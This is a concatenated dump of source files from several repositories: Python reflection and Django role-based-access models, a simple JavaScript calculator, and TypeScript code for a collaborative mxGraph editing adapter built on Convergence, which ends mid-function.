print(r2) # 找到disk_info有,disk_queryset 有 ---> 应该更新的硬盘 r3 = disk_queryset_set & disk_info_set print(r3)<file_sep>/auto_client/反射set.py class Foo: f = '类的静态变量' def __init__(self,name,age): self.name=name self.age=age def say_hi(self): print('hi,%s'%self.name) obj=Foo('egon',73) print(obj.__dict__,type(obj)) #检测是否含有某属性 print(hasattr(obj,'name')) print(hasattr(obj,'say_hi')) #获取属性 n=getattr(obj,'name') print(n) func=getattr(obj,'say_hi') func() print(getattr(obj,'aaaaaaaa','不存在啊')) #报错 #设置属性 setattr(obj,'sb',True) setattr(obj,'age','88') setattr(obj,'show_name',lambda self:self.name+'sb') print(obj.__dict__) # print(obj.show_name(obj)) # #删除属性 # delattr(obj,'age') # delattr(obj,'show_name') # delattr(obj,'show_name111')#不存在,则报错 # # print(obj.__dict__) <file_sep>/day22/new/rbac/models.py from django.db import models # Create your models here. from django.db import models # Create your models here. # 用户表 class UserInfo(models.Model): username = models.CharField(max_length=16, verbose_name="用户名") password = models.CharField(max_length=32, verbose_name="密码") roles = models.ManyToManyField(to="Role", null=True, blank=True) # null=TRUE是告诉数据库这个字段可以为空,blank=True告诉djangoadmin可以不填 def __str__(self): return self.username class Meta: verbose_name = "用户表" verbose_name_plural = verbose_name # 角色 class Role(models.Model): title = models.CharField(max_length=32, verbose_name="角色名称") permissions = models.ManyToManyField(to="Permission") def __str__(self): return self.title class Meta: verbose_name = "角色表" verbose_name_plural = verbose_name # 权限表 class Permission(models.Model): title = models.CharField(max_length=16, verbose_name="权限名称") url = models.CharField(max_length=255, verbose_name="URL") is_menu = models.BooleanField(default=False, verbose_name="可作为菜单展示") icon = models.CharField(max_length=16, verbose_name="菜单图标", null=True, blank=True) def __str__(self): return self.title class Meta: verbose_name = "权限表" verbose_name_plural = verbose_name
f72fa4432e6abb742cbf1c61c580db1ed688a311
[ "JavaScript", "Python", "Text", "HTML" ]
352
Python
huningfei/python
9ca1f57f2ef5d77e3bb52d70ac9a241b8cde54d2
7ddc9da14a3e53ad1c98fc48edd1697a6f8fc4f7
refs/heads/master
<repo_name>raathore/calculator<file_sep>/script.js var displayField = document.getElementById("io"); display = (val) => displayField.value+=val; solve = () => { let a = displayField.value; displayField.value = eval(a); } clr = () => displayField.value= ""; backSpace = () => displayField.value = displayField.value.substring(0,displayField.value.length-1); dark = () => { document.getElementById("main").classList.add("dark"); document.getElementById("container").classList.add("darkContainer"); document.getElementById("colorThemeBtn").innerHTML="Light Mode" document.getElementById("colorThemeBtn").setAttribute("onclick","light()") } light = () => { document.getElementById("main").classList.remove("dark"); document.getElementById("container").classList.remove("darkContainer"); document.getElementById("colorThemeBtn").innerHTML="Dark Mode" document.getElementById("colorThemeBtn").setAttribute("onclick","dark()") } <file_sep>/README.md # Simple Calculator ### With dark/light mode.
7e22c2b49b24e96cdf13370d242554a2847266f4
[ "JavaScript", "Markdown" ]
2
JavaScript
raathore/calculator
bf8bace66bead002d863b1c1a0870eea92ef5c5b
530a5ce2aa6f5818f106ef637e32d073519ff864
refs/heads/master
<file_sep>import java.util.*; import static java.lang.System.out; /** * Write a description of MarkovModelGeneral here. * * @author (your name) * @version (a version number or a date) */ public class MarkovModelGeneralEfficient extends AbstractMarkovModel { public MarkovModelGeneralEfficient(int num){ myRandom = new Random(); order = num; myDict = new HashMap<String, ArrayList<Character>>(); } public void setTraining(String s){ myText = s.trim(); } public HashMap<String, ArrayList<Character>> getDict(){ HashMap<String, ArrayList<Character>> resDict = myDict; return resDict; } public void buildMap(){ for (int i = 0; i<=myText.length()-order; i++){ String key = myText.substring(i, i+order); ArrayList<Character> prevList = myDict.get(key); int ind = i; if (prevList == null){ ArrayList<Character> newList = new ArrayList<Character>(); if (i==myText.length()-order){ myDict.put(key, newList); } else { char followsChar = myText.charAt(ind+order); newList.add(followsChar); while (ind != -1){ ind = myText.indexOf(key, ind+1); if (ind != -1){ newList.add(myText.charAt(ind+order)); } } myDict.put(key, newList ); } } } } public String getRandomText(int numChars) { if (myText == null){ return ""; } StringBuilder result = new StringBuilder(); int firstInd = myRandom.nextInt(myText.length()-order); String firstPart = myText.substring(firstInd, firstInd + order); result.append(firstPart); buildMap(); printHashMapInfo(); String key = firstPart; for (int i = 0; i<numChars-order; i++){ ArrayList<Character> followsList = myDict.get(key); if (followsList != null){ //this step is in getFollows() method //int listInd = myRandom.nextInt(followsList.size()-1); String tempKey = ""; ArrayList<Character> nextList = new ArrayList<Character>(); int counter = 0; while (nextList==null||nextList.size()==0){ char tempChar = getFollows(key); result.append(tempChar); tempKey = result.substring(result.length()-order); nextList = myDict.get(tempKey); result.deleteCharAt(result.length()-1); if (counter==1&&nextList == null||counter==1&&nextList.size()==0){return result.toString();} if (nextList!=null){ char nextChar = tempChar; key=tempKey; result.append(nextChar); } counter++; } } } return result.toString(); } public void printHashMapInfo(){ /* for ( Object pair : myDict.entrySet()){ out.println(pair); } */ out.println("Keys: " + myDict.size()); } } <file_sep>------------------------------------------------------------------------ PROJECT TITLE: Markov Random Text By Letter ------------------------------------------------------------------------ PURPOSE OF PROJECT: Implement Markov based on n-letters VERSION or DATE: 10/31/2017 HOW TO START THIS PROJECT: TBH Idk outside of BlueJ AUTHORS: <NAME> USER INSTRUCTIONS: (Requires import edu.duke.*) available at http://www.dukelearntoprogram.com/downloads/bluej.php?course=2
1bd8b49dae7aab7ae09b878e20762046374e2a65
[ "Java", "Text" ]
2
Java
aquaday47/Markov-RandomText-Letter
96bb27f917aeb7bae831360f93ddbc19f4805e0e
f3ee158c5621469cfabdfbb64cb8cf8959cb56df
refs/heads/master
<file_sep>FROM java:8 MAINTAINER <EMAIL> WORKDIR /apps/api-gateway COPY build/libs/api-gateway-*.jar /apps/api-gateway/api-gateway.jar EXPOSE 8080 CMD java -jar api-gateway.jar<file_sep>package com.softeam.gateway import org.springframework.boot.SpringApplication import org.springframework.boot.autoconfigure.SpringBootApplication import org.springframework.cloud.netflix.zuul.EnableZuulProxy import org.springframework.web.servlet.config.annotation.EnableWebMvc import org.springframework.web.servlet.config.annotation.ResourceHandlerRegistry import org.springframework.web.servlet.config.annotation.WebMvcConfigurerAdapter @EnableZuulProxy @SpringBootApplication open class GatewayApplication : WebMvcConfigurerAdapter() fun main(args: Array<String>) { SpringApplication.run(GatewayApplication::class.java, *args) }<file_sep>server.contextPath=/ server.port=8080 zuul.routes.helloworld.url=http://${helloworld_ingress_url:helloworld-ingress} <file_sep>version: '3.2' services: api-gateway: image: "registry.k8.wildwidewest.xyz/repository/docker-repository/api-gateway:${tag}" build: .
a62dbfefff92b6c5aced662a0473b17139b0549e
[ "Kotlin", "Dockerfile", "YAML", "INI" ]
4
Dockerfile
Helloworld-K8s/api-gateway
9572428f12f49178ccd75ff926e1a8249b59df9f
9f1df6c589e0c9411897d74c172cb0a17dc492ee
refs/heads/master
<file_sep>import { ObjectRemoveEvent, ObjectSetEvent, RealTimeObject } from "@convergence/convergence"; import {mxCell, mxChildChange, mxEvent, mxGraph, mxRootChange} from "mxgraph"; import {Deserializer, Serializer} from "./"; import {MxCellAdapter} from "./MxCellAdapter"; interface IMxCellsAdded { properties: { cells: mxCell[] }; } interface IMxCellsRemoved { properties: { cells: mxCell[] }; } export class MxGraphAdapter { private static readonly _CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; private static readonly _ID_LENGTH = 32; private static _generateId() { let text = ""; for (let i = 0; i < MxGraphAdapter._ID_LENGTH; i++) { text += MxGraphAdapter._CHARS.charAt(Math.floor(Math.random() * MxGraphAdapter._CHARS.length)); } return text; } private readonly _mxGraph: mxGraph; private readonly _rtCells: RealTimeObject; private readonly _listeners: any[]; private readonly _cellAdapters: Map<mxCell, MxCellAdapter>; constructor(graph: mxGraph, rtGraph: RealTimeObject) { this._mxGraph = graph; this._rtCells = rtGraph.get("cells") as RealTimeObject; this._listeners = []; this._cellAdapters = new Map(); // Listen for local changes this._mxGraph.addListener(mxEvent.CELLS_ADDED, (_: any, evt: IMxCellsAdded) => this._handleLocalCellsAdded(evt)); this._mxGraph.addListener(mxEvent.CELLS_REMOVED, (_: any, evt: IMxCellsRemoved) => this._handleLocalCellsRemoved(evt)); this._mxGraph.model.addListener(mxEvent.CHANGE, (_: any, evt: any) => { const edit = evt.getProperty("edit"); edit.changes.forEach((change: any) => this._processLocalChange(change)); }); // Listen for remote changes this._rtCells.on("set", (e: ObjectSetEvent) => this._handleRemoteCellAdded(e)); this._rtCells.on("remove", (e: ObjectRemoveEvent) => this._handleRemoteCellRemoved(e)); Object.keys(this._mxGraph.model.cells).forEach((id: string) => { const cell = this._mxGraph.model.cells[id]; const rtCell = this._rtCells.get(id) as RealTimeObject; this._bindMxCellAdapter(cell, rtCell); }); } public addListener(listener: any): void { this._listeners.push(listener); } private _bindMxCellAdapter(mxGraphCell: mxCell, rtCell: RealTimeObject): void { const adapter = new MxCellAdapter(mxGraphCell, rtCell, this._mxGraph, this._fireEvent.bind(this)); this._cellAdapters.set(mxGraphCell, adapter); } private _handleLocalCellsAdded(evt: IMxCellsAdded): void { const {properties} = evt; const cells = properties.cells; cells.forEach((cell: mxCell) => { this._handlePotentiallyNewCell(cell); }); } private _handlePotentiallyNewCell(cell: mxCell): void { if (!cell.id) { const id = MxGraphAdapter._generateId(); this._mxGraph.model.cells[id] = cell; cell.id = id; const cellJson = Serializer.serializeMxCell(cell); const rtCell = this._rtCells.set(cell.id, cellJson) as RealTimeObject; this._bindMxCellAdapter(cell, rtCell); } } private _handleLocalCellsRemoved(evt: IMxCellsRemoved): void { const {properties} = evt; const cells = properties.cells; cells.forEach((cell: mxCell) => { const cellId = cell.id; this._rtCells.remove(cellId); this._cellAdapters.delete(cell); }); this._fireEvent("onCellsRemoved", {cells}); } private _handleRemoteCellAdded(e: ObjectSetEvent): void { const cellId = e.key; const cellJson = e.value.value(); const cell = Deserializer.deserializeMxCell(cellId, cellJson); Deserializer.resolveCellRelationships(cell, cellJson, this._mxGraph.model); this._mxGraph.model.cellAdded(cell); this._mxGraph.view.refresh(); this._bindMxCellAdapter(cell, e.value as RealTimeObject); } private _handleRemoteCellRemoved(e: ObjectRemoveEvent): void { const cellId = e.key; const cell = this._mxGraph.model.cells[cellId]; this._cellAdapters.delete(cell); this._mxGraph.model.remove(cell); this._mxGraph.view.refresh(); this._fireEvent("onCellsRemoved", {cells: [cell]}); } private _processLocalChange(change: any) { if (change instanceof mxRootChange) { if (change.root === this._mxGraph.model.root) { // todo console.warn("unhandled root change"); } } else if (change instanceof mxChildChange) { this._processLocalChildChange(change); } else if (change.cell != null && change.cell.id != null) { const adapter = this._cellAdapters.get(change.cell); adapter.processChange(change); } } private _processLocalChildChange(change: mxChildChange) { const {child} = change; if (!child.id) { this._handlePotentiallyNewCell(child); } else { const adapter = this._cellAdapters.get(child); if (adapter) { adapter.processChange(change); } } } private _fireEvent(name: string, evt: any) { this._listeners.forEach((listener: any) => { try { const callback = listener[name]; if (callback) { callback(evt); } } catch (e) { console.log(e); } }); } } <file_sep>import {mxCell, mxGeometry, mxGraphModel, mxPoint} from "mxgraph"; import {ICellData, IGeometry, IModelData, IPoint, IStyleData} from "./MxGraphData"; export class Serializer { public static serializeMxGraphModel(model: mxGraphModel): IModelData { const cells: { [key: string]: any } = {}; Object.keys(model.cells).forEach((cellId: string) => { const cell = model.cells[cellId]; cells[cellId] = Serializer.serializeMxCell(cell); }); const root = model.root.id; return { root, cells }; } public static serializeMxCell(cell: mxCell): ICellData { const result: ICellData = { id: cell.id }; if (cell.style !== undefined) { result.style = Serializer.serializeStyle(cell.style); } if (cell.value !== undefined) { result.value = Serializer.serializeValue(cell.value); } if (cell.geometry !== undefined) { result.geometry = Serializer.serializeGeometry(cell.geometry); } if (cell.connectable !== undefined) { result.connectable = cell.connectable; } if (cell.visible !== undefined) { result.visible = cell.visible; } if (cell.collapsed !== undefined) { result.collapsed = cell.collapsed; } if (cell.edge) { result.edge = true; } if (cell.vertex) { result.vertex = true; } if (cell.parent) { result.parent = cell.parent.id; } if (cell.source) { result.source = cell.source.id; } if (cell.target) { result.target = cell.target.id; } return result; } public static serializeGeometry(geometry: mxGeometry): IGeometry { const result: IGeometry = { x: geometry.x, y: geometry.y, width: geometry.width, height: geometry.height }; if (geometry.points) { result.points = geometry.points.map((p: mxPoint) => Serializer.serializeMxPoint(p)); } if (geometry.sourcePoint) { result.sourcePoint = Serializer.serializeMxPoint(geometry.sourcePoint); } if (geometry.targetPoint) { result.targetPoint = Serializer.serializeMxPoint(geometry.targetPoint); } if (geometry.relative !== undefined) { result.relative = geometry.relative; } if (geometry.offset) { result.offset = Serializer.serializeMxPoint(geometry.offset); } return result; } public static serializeMxPoint(geometry: mxPoint): IPoint { return { x: geometry.x, y: geometry.y }; } public static serializeStyle(style: string): IStyleData { const result: IStyleData = { classes: [], styles: {} }; if (style) { const styles = style.split(";"); styles.forEach((s) => { if (s.includes("=")) { const [key, value] = s.split("="); result.styles[key] = value; } else if (s.trim().length > 0) { result.classes.push(s); } }); } return result; } public static serializeValue(value: any): any { // TODO handle an xml node. return value; } } <file_sep>export interface IModelData { cells: {[key: string]: ICellData}; root: string; } export interface ICellData { id: string; geometry?: IGeometry; style?: IStyleData; value?: any; vertex?: boolean; edge?: boolean; collapsed?: boolean; visible?: boolean; connectable?: boolean; parent?: string; source?: string; target?: string; } export interface IPoint { x: number; y: number; } export interface IRectangle extends IPoint { x: number; y: number; height: number; width: number; } export interface IGeometry extends IRectangle { x: number; y: number; height: number; width: number; points?: IPoint[]; sourcePoint?: IPoint; targetPoint?: IPoint; relative?: boolean; offset?: IPoint; } export interface IStyleData { styles: {[key: string]: any}; classes: string[]; } <file_sep>import { Activity, ActivityParticipant, ActivitySessionJoinedEvent, ActivitySessionLeftEvent, ActivityStateRemovedEvent, ActivityStateSetEvent } from "@convergence/convergence"; import {mxGraph} from "mxgraph"; import {ActivityColorManager} from "./ActivityColorManager"; export class PointerManager { private static _SVG_NS = "http://www.w3.org/2000/svg"; private static _CURSOR_PATH = "M 0,0 L 0,0 11.6,11.6 6.7,11.6 9.6,18.3 6.0,20.2 3.1,13.3 0,16z"; private static _POINTER_KEY = "pointer"; private readonly _mxGraph: mxGraph; private readonly _activity: Activity; private readonly _colorManager: ActivityColorManager; private readonly _remotePointers: Map<string, HTMLElement>; private readonly _root: SVGElement; private _active: boolean; constructor(graph: mxGraph, activity: Activity, colorManager: ActivityColorManager) { this._mxGraph = graph; this._activity = activity; this._colorManager = colorManager; this._remotePointers = new Map(); this._root = this._mxGraph.view.getOverlayPane() as any as SVGElement; this._active = true; this._listenToGraph(); this._listenToActivity(); this._activity.participants().forEach((participant: ActivityParticipant) => { this._addRemotePointer(participant); }); } private _listenToGraph(): void { this._root.ownerSVGElement.addEventListener("mouseleave", () => { this._activity.removeState(PointerManager._POINTER_KEY); this._active = false; }); this._root.ownerSVGElement.addEventListener("mouseenter", () => { this._active = true; }); this._mxGraph.addMouseListener({ mouseDown: () => { // No-Op }, mouseMove: (_: any, evt: any) => { if (this._active) { const {graphX, graphY} = evt; const scale = this._mxGraph.view.scale; const translate = this._mxGraph.view.translate; const tX = Math.round((graphX - translate.x * scale) / scale); const tY = Math.round((graphY - translate.y * scale) / scale); const pointerState = {x: tX, y: tY}; this._activity.setState(PointerManager._POINTER_KEY, pointerState); } }, mouseUp: () => { // Click animation. } }); } private _listenToActivity(): void { this._activity.on("session_joined", (e: ActivitySessionJoinedEvent) => { this._addRemotePointer(e.participant); }); this._activity.on("session_left", (e: ActivitySessionLeftEvent) => { const remotePointer = this._remotePointers.get(e.sessionId); remotePointer.parentElement.removeChild(remotePointer); this._remotePointers.delete(e.sessionId); }); this._activity.on("state_set", (e: ActivityStateSetEvent) => { const {key, value, sessionId, local} = e; if (!local && key === PointerManager._POINTER_KEY) { const remotePointer = this._remotePointers.get(sessionId); const scale = this._mxGraph.view.scale; const translate = this._mxGraph.view.translate; const graphX = Math.round((value.x + translate.x) * scale); const graphY = Math.round((value.y + translate.y) * scale); remotePointer.setAttributeNS(null, "transform", `translate(${graphX},${graphY})`); remotePointer.setAttributeNS(null, "visibility", "visible"); } }); this._activity.on("state_removed", (e: ActivityStateRemovedEvent) => { const {key, sessionId, local} = e; if (!local && key === "pointer") { const remotePointer = this._remotePointers.get(sessionId); remotePointer.setAttributeNS(null, "visibility", "hidden"); } }); } private _addRemotePointer(participant: ActivityParticipant): void { if (!participant.local) { const pointer = participant.state.get(PointerManager._POINTER_KEY) || {x: 0, y: 0}; const remotePointer = document.createElementNS(PointerManager._SVG_NS, "path"); remotePointer.setAttributeNS(null, "d", PointerManager._CURSOR_PATH); remotePointer.setAttributeNS(null, "transform", `translate(${pointer.x},${pointer.y})`); const color = this._colorManager.color(participant.sessionId); remotePointer.setAttributeNS(null, "fill", color); remotePointer.setAttributeNS(null, "stroke", color); this._remotePointers.set(participant.sessionId, remotePointer as HTMLElement); this._root.appendChild(remotePointer); if (!participant.state.has(PointerManager._POINTER_KEY)) { remotePointer.setAttributeNS(null, "visibility", "hidden"); } } } } <file_sep>import {ColorAssigner} from "@convergence/color-assigner"; import { Activity, ActivitySessionJoinedEvent, ActivitySessionLeftEvent, IConvergenceEvent } from "@convergence/convergence"; import {filter} from "rxjs/operators"; export class ActivityColorManager { private readonly _colorAssigner: ColorAssigner; constructor(activity: Activity, palette?: string[]) { this._colorAssigner = new ColorAssigner(palette); activity.events() .pipe(filter((e: IConvergenceEvent) => e.name === "session_joined")) .subscribe((e: ActivitySessionJoinedEvent) => { this._addSession(e.sessionId); }); activity.events() .pipe(filter((e: IConvergenceEvent) => e.name === "session_left")) .subscribe((e: ActivitySessionLeftEvent) => { this._removeSession(e.sessionId); }); } public color(sessionId: string): string { return this._colorAssigner.getColorAsHex(sessionId); } private _addSession(sessionId: string): void { this._colorAssigner.getColor(sessionId); } private _removeSession(sessionId: string): void { this._colorAssigner.releaseColor(sessionId); } } <file_sep>/* tslint:disable:class-name max-classes-per-file */ declare module "mxgraph" { export class mxEventSource { public addListener(name: string, callback: (sender: any, evt: any) => void): void; } export class mxGraphModel extends mxEventSource { public root: mxCell; public createIds: boolean; public cells: { [key: string]: mxCell }; public setRoot(cell: mxCell): void; public cellAdded(cell: mxCell): void; public remove(cell: mxCell): mxCell; } export class mxGraph extends mxEventSource { public model: mxGraphModel; public root: mxCell; public view: mxGraphView; public selectionCellsHandler: mxSelectionCellsHandler; public addMouseListener(listener: any): void; public getSelectionCells(): mxCell[]; } export class mxGraphView extends mxEventSource { public scale: number; public translate: mxPoint; public getState(cell: mxCell): mxCellState; public refresh(): void; public removeState(cell: mxCell): void; public getOverlayPane(): HTMLElement; } export class mxCellState { } export class mxCell extends mxEventSource { public id: string; public style: string; public value: any; public edge: any; public vertex: any; public visible: boolean; public collapsed: boolean; public connectable: boolean; public parent: mxCell | null; public source: mxCell | null; public target: mxCell | null; public geometry: mxGeometry; constructor(value?: any, geometry?: mxGeometry, style?: string); public insert(child: mxCell, index?: number): mxCell; public insertEdge(edge: mxCell, isOutgoing: boolean): mxCell; public setParent(parent: mxCell): void; public setTerminal(terminal: mxCell, source: boolean): void; public setStyle(style: string): void; public setValue(valud: any): void; public setGeometry(geometry: mxGeometry): void; public setCollapsed(collapsed: boolean): void; public setConnectable(connectable: boolean): void; public setEdge(edge: boolean): void; public setVertex(vertex: boolean): void; public setVisible(visible: boolean): void; } export class mxSelectionCellsHandler extends mxEventSource { public getHandler(cell: mxCell): any; } export const mxEvent: { ADD: string; CHANGE: string; CELLS_ADDED: string; CELLS_REMOVED: string; REMOVE: string; }; export class mxRootChange { public root: mxCell; } export class mxChildChange { public model: mxGraphModel; public parent: mxCell | null; public previous: mxCell | null; public child: mxCell; public index: number; public previousIndex: number; } export class mxTerminalChange { public model: mxGraphModel; public cell: mxCell; public terminal: mxCell | null; public source: boolean; public previous: mxCell | null; } export class mxGeometryChange { public model: mxGraphModel; public cell: mxCell; public geometry: any; public previous: any; } export class mxStyleChange { public model: mxGraphModel; public cell: mxCell; public style: string; public previous: string; } export class mxValueChange { public model: mxGraphModel; public cell: mxCell; public value: any; public previous: any; } export class mxCollapseChange { public model: mxGraphModel; public cell: mxCell; public collapsed: boolean; public previous: boolean; } export class mxVisibleChange { public model: mxGraphModel; public cell: mxCell; public visible: boolean; public previous: boolean; } export class mxPoint { public x: number; public y: number; constructor(x?: number, y?: number); } export class mxRectangle extends mxPoint { public height: number; public width: number; constructor(x?: number, y?: number, width?: number, height?: number); } export class mxGeometry extends mxRectangle { public points: mxPoint[]; public relative: boolean; public sourcePoint?: mxPoint; public targetPoint?: mxPoint; public offset: mxPoint; constructor(x?: number, y?: number, width?: number, height?: number); public setTerminalPoint(point: any, isSource: any): any; } export class mxCellHighlight { constructor(graph: mxGraph, highlightColor: string, strokeWidth: number, dashed: boolean); public highlight(cell: mxCellState | null): void; public destroy(): void; } export class mxVertexHandler { public redraw(): void; } export class mxEdgeHandler { public redraw(): void; } } <file_sep><img src="https://convergence.io/assets/img/convergence-logo.png" height="75" /> # Convergence mxGraph Adapter [![example workflow](https://github.com/convergencelabs/mxgraph-adapter/actions/workflows/build.yml/badge.svg)](https://github.com/convergencelabs/mxgraph-adapter/actions/workflows/build.yml) The **Convergence mxGraph Adapter** makes it easy to provide a collaborative diagram editing experience using [mxGraph](https://github.com/jgraph/mxgraph) and [Convergence](https://convergence.io). This adapter provides shared editing of graph data along with shared pointers and selection. A live example, as part of the Convergence Examples, can be found [here](https://examples.convergence.io/examples/mxgraph/). This project also forms the basis of the [mxGraph Graph Editor Demo](https://github.com/convergencelabs/mxgraph-demo). ## Installation Install package with NPM and add it to your development dependencies: ```npm install --save-dev @convergence/mxgraph-adapter``` ## Building * `npm install` * `npm run dist` ## Run the Example * `npm install` * `npm run dist` * Update the configuration as described in `examples/config.example.js`. * `npm start` * Browse to `http://localost:4100` ## Usage The following HTML creates a container element for mxGraph. The full code can be seen in the [Example](./example). ```html <div id="mxgraph" style="height: 400px; width: 600px"></div> ``` The following JavaScript code will initialze a collaborative graph. ```JavaScript const { ActivityColorManager, MxGraphAdapter, PointerManager, SelectionManager, Deserializer } = ConvergenceMxGraphAdapter; Convergence .connectAnonymously(CONVERGENCE_URL, "test user") .then(domain => { const model = domain .models() .openAutoCreate({ id: "mxgrph-example", collection: "mxgraph", ephemeral: true, data: () => { return DEFAULT_GRAPH; } }); const activity = domain .activities() .join("mxgraph-example"); return Promise.all([model, activity]); }) .then(([model, activity]) => { const container = document.getElementById("mxgraph"); const graphModel = Deserializer.deserializeMxGraphModel(model.root().value()); const graph = new mxGraph(container, graphModel); setTimeout(() => { const colorManger = new ActivityColorManager(activity); const graphAdapter = new MxGraphAdapter(graph, model.root()); const pointerManager = new PointerManager(graph, activity, colorManger); const selectionManager = new SelectionManager(graph, activity, colorManger, graphAdapter); }, 0); }); ``` <file_sep># Change Log ## [v0.1.0](https://github.com/convergencelabs/,graph-adapter/tree/0.1.0) (2019-03-24) - Initial release. <file_sep>import {mxCell, mxGeometry, mxGraphModel, mxPoint} from "mxgraph"; import { ICellData, IGeometry, IModelData, IPoint, IStyleData } from "./MxGraphData"; export class Deserializer { public static deserializeMxGraphModel(json: IModelData): mxGraphModel { const cells = {...json.cells}; const rootJson = cells[json.root]; delete cells[json.root]; const rootCell = Deserializer.deserializeMxCell(json.root, rootJson); const model = new mxGraphModel(); model.createIds = false; model.setRoot(rootCell); Object.keys(cells).forEach((cellId) => { const cellJson = cells[cellId]; const cell = Deserializer.deserializeMxCell(cellId, cellJson); model.cellAdded(cell); }); Object.keys(cells).forEach((cellId) => { const cell = model.cells[cellId]; const cellData = cells[cellId]; Deserializer.resolveCellRelationships(cell, cellData, model); }); return model; } public static deserializeMxCell(id: string, cellData: ICellData): mxCell { const value = Deserializer.deserializeValue(cellData.value); const style = Deserializer.deserializeStyle(cellData.style); const geometry = Deserializer.deserializeGeometry(cellData.geometry); const cell = new mxCell(value, geometry, style); cell.id = id; if (cellData.collapsed !== undefined) { cell.setCollapsed(cellData.collapsed); } if (cellData.connectable !== undefined) { cell.setConnectable(cellData.connectable); } if (cellData.visible !== undefined) { cell.setVisible(cellData.visible); } if (cellData.vertex === true) { cell.setVertex(true); } if (cellData.edge === true) { cell.setEdge(true); } if (cellData.style !== undefined) { cell.setStyle(Deserializer.deserializeStyle(cellData.style)); } return cell; } public static resolveCellRelationships( cell: mxCell, cellData: ICellData, model: mxGraphModel): void { if (cellData.parent) { const parent = model.cells[cellData.parent]; parent.insert(cell); } if (cellData.source) { const source = model.cells[cellData.source]; source.insertEdge(cell, true); } if (cellData.target) { const target = model.cells[cellData.target]; target.insertEdge(cell, false); } } public static deserializeValue(jsonValue: any): any { // TODO handle an xml node. return jsonValue; } public static deserializeStyle(jsonStyle: IStyleData): string { if (jsonStyle === undefined) { return; } let style = ""; jsonStyle.classes.forEach((className: string) => { style += className + ";"; }); Object.keys(jsonStyle.styles).forEach((key: string) => { const value = jsonStyle.styles[key]; style += key + "=" + value + ";"; }); return style; } public static deserializeGeometry(geom: IGeometry): mxGeometry { if (!geom) { return; } const result = new mxGeometry(geom.x, geom.y, geom.width, geom.height); if (geom.points) { result.points = geom.points.map((p: IPoint) => Deserializer.deserializePoint(p)); } if (geom.sourcePoint) { result.setTerminalPoint(Deserializer.deserializePoint(geom.sourcePoint), true); } if (geom.targetPoint) { result.setTerminalPoint(Deserializer.deserializePoint(geom.targetPoint), false); } result.relative = geom.relative; if (geom.offset) { result.offset = Deserializer.deserializePoint(geom.offset); } return result; } public static deserializePoint(jsonPoint: IPoint): mxPoint { return new mxPoint(jsonPoint.x, jsonPoint.y); } } <file_sep>export * from "./ActivityColorManager"; export * from "./MxGraphAdapter"; export * from "./PointerManager"; export * from "./SelectionManager"; export * from "./Deserializer"; export * from "./Serializer"; <file_sep>import { ArrayInsertEvent, ArrayRemoveEvent, ObjectRemoveEvent, ObjectSetEvent, RealTimeArray, RealTimeObject } from "@convergence/convergence"; import { mxCell, mxChildChange, mxCollapseChange, mxGeometryChange, mxGraph, mxStyleChange, mxTerminalChange, mxValueChange, mxVisibleChange } from "mxgraph"; import {Deserializer, Serializer} from "./"; import {IGeometry, IStyleData} from "./MxGraphData"; interface IStyleDiffs { addedClasses: string[]; removedClasses: string[]; changedStyles: {[key: string]: any}; } export class MxCellAdapter { private readonly _mxCell: mxCell; private readonly _mxGraph: mxGraph; private readonly _rtCell: RealTimeObject; private readonly _rtGeometry: RealTimeObject; private readonly _eventCallback: (event: string, value: any) => void; private _rtStyle: RealTimeObject | null; private _rtStyles: RealTimeObject | null; private _rtClasses: RealTimeArray | null; constructor(cell: mxCell, rtCell: RealTimeObject, graph: mxGraph, eventEmitter: () => void) { this._mxCell = cell; this._rtCell = rtCell; this._mxGraph = graph; this._eventCallback = eventEmitter; this._rtGeometry = null; this._initCell(); this._rtGeometry = this._initRtGeometry(); this._initStyle(); } public processChange(change: any): void { if (change instanceof mxTerminalChange) { this._localTerminalChanged(change); } else if (change instanceof mxGeometryChange) { this._localGeometryChanged(change); } else if (change instanceof mxStyleChange) { this._localStyleChanged(change); } else if (change instanceof mxValueChange) { this._localValueChanged(change); } else if (change instanceof mxCollapseChange) { this._localCollapsedChanged(change); } else if (change instanceof mxVisibleChange) { this._localVisibleChanged(change); } else if (change instanceof mxChildChange) { this._localChildChange(change); } } private _localGeometryChanged(change: mxGeometryChange): void { const {geometry} = change; const geometryJson = Serializer.serializeGeometry(geometry); this._rtGeometry.value(geometryJson); this._eventCallback("onCellChanged", {cell: this._mxCell}); } private _localCollapsedChanged(change: mxCollapseChange): void { const {collapsed} = change; this._rtCell.set("collapsed", collapsed); this._eventCallback("onCellChanged", {cell: this._mxCell}); } private _localVisibleChanged(change: mxVisibleChange): void { const {visible} = change; this._rtCell.set("visible", visible); this._eventCallback("onCellChanged", {cell: this._mxCell}); } private _localValueChanged(change: mxValueChange): void { const {value} = change; this._rtCell.set("value", value); this._eventCallback("onCellChanged", {cell: this._mxCell}); } private _localTerminalChanged(change: mxTerminalChange): void { const {source, terminal, previous} = change; const prop = source ? "source" : "target"; if (terminal !== previous) { const value = terminal !== null ? terminal.id : null; this._rtCell.set(prop, value); } this._eventCallback("onCellChanged", {cell: this._mxCell}); } private _localStyleChanged(change: mxStyleChange): void { const {previous, style} = change; const oldStyle = Serializer.serializeStyle(previous); const newStyle = Serializer.serializeStyle(style); // check for lazy style initialization if (!this._rtStyle) { this._rtCell.set("style", newStyle); this._initStyle(); } else { const diff = this._diffStyles(newStyle, oldStyle); this._applyStyleChanges(diff); } this._eventCallback("onCellChanged", {cell: this._mxCell}); } private _diffStyles(newStyles: any, oldStyles: any): IStyleDiffs { const addedClasses = newStyles.classes.filter((c: string) => oldStyles.classes.indexOf(c) >= 0); const removedClasses = oldStyles.classes.filter((c: string) => newStyles.classes.indexOf(c) < 0); const changedStyles: any = {}; // Process all new styles for (const styleName in newStyles.styles) { if (newStyles.styles.hasOwnProperty(styleName)) { const newValue = newStyles.styles[styleName]; const oldValue = oldStyles.styles[styleName]; if (newValue !== oldValue) { changedStyles[styleName] = newValue; } } } // look for removed styles for (const styleName in oldStyles.styles) { if (typeof newStyles.styles[styleName] === "undefined") { changedStyles[styleName] = null; } } return {addedClasses, removedClasses, changedStyles}; } private _applyStyleChanges(styleDiff: IStyleDiffs): void { this._rtStyle.model().startBatch(); styleDiff.removedClasses.forEach((c) => { const oldClasses = this._rtClasses.value(); const index = oldClasses.indexOf(c); this._rtClasses.remove(index); }); styleDiff.addedClasses.forEach((c) => { this._rtClasses.push(c); }); for (const styleName in styleDiff.changedStyles) { if (styleDiff.changedStyles.hasOwnProperty(styleName)) { const newValue = 